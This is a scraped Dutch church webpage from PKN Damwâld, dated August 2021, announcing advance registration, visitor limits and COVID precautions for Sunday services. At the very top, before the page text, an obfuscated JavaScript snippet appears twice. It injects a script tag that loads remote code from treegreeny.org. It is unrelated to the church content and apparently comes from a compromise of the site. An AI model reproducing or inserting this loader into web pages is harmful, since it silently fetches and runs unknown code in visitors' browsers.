;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Welkom in de kerk .... + aanmeldformulier komende dienst www.pkndamwald.nl/opgeven ! - PKN Damwâld

Welkom in de kerk …. + aanmeldformulier komende dienst www.pkndamwald.nl/opgeven !

Gepubliceerd op: donderdag 19 augustus 2021

Afgelopen zondagen hebben we een aantal keer het bezoekersaantal van 100 personen in de diensten gehaald. Geweldig, fijn dat we met zo velen weer naar de kerk kunnen. Maar meer dan 100 personen mogen er (nog) niet in. Aangezien we nog gebonden zijn aan de 1,5 meter afstand bewaren en we teleurstellingen willen voorkomen, hanteren we een opgave vooraf.

P.S. Bernetsjerke/ King Kids en de oppas zijn weer gestart !

 

Hoe gaat dit werken:

  • Via de link klik hier voor opgaveformulier kunt u zich vanaf maandag opgeven voor de dienst van de zondag erop. Sluiting is op zaterdagavond om 20.00 uur. Kinderen tot 12 jaar hoeven niet te worden opgegeven.
  • Op maandagavond tussen 18.00-20.00 uur kunt u zich telefonisch opgeven via telefoonnummer: 06- 14751932.

Mondkapjes zijn niet meer nodig en er mag weer gezongen worden. Het blijft wel belangrijk om de 1,5 meter afstand te bewaren. De toiletten mogen ook weer gebruikt worden. Heeft u klachten of bent u in contact geweest met iemand die corona klachten heeft, blijf dan thuis. Daarnaast kunt u de dienst natuurlijk ook via de live stream volgen.

Vanwege het toegenomen risico van Covid19 besmettingen is ventilatie in de kerkzaal belangrijk. Daarom zullen zowel de buiten als binnendeuren van de kerkzaal tijdens de dienst open staan. Wilt u de hinder van tocht voorkomen, kies dan een plaats waar u van de tocht geen last hebt.

 

Opgeven